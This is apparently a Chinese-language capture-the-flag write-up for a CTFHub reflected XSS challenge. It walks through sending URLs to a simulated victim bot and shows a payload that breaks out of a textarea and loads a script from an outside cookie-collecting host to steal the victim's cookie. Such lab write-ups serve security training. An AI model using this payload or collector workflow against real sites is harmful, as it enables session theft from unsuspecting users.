打开题目,我们先试试最常规的 XSS 脚本:

    1. <script>alert(document.cookie)</script>

    1.png

    XSS 的功能是窃取别人的 Cookie,第二行要我们把 URL 发送给一个机器人(BOT),这模拟了受害者点击了我们的恶意 URL,进而导致他 Cookie 被泄露给我们的情况。

    我们试一试向 BOT 发送一个 URL:

    http://challenge-73094da8c3ed13c4.sandbox.ctfhub.com:10800/?name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

    2.png

    返回了Successfully,这里我们可以用 XSS Platform 来配置一个恶意后端,获取受害者的 Cookie。

    我们用临时邮箱注册一个账户,然后创建默认项目:

    3.png

    完成后是这样的:

    4.png

    把画红框的地方填写到 URL 的name参数后面,发送给 BOT:

    http://challenge-73094da8c3ed13c4.sandbox.ctfhub.com:10800/?name=</textarea>'"><script src=http://xsscom.com//fzGxtK></script>

    5.png

    之后就能在项目里面看到 Cookie 中放有 Flag:

    6.png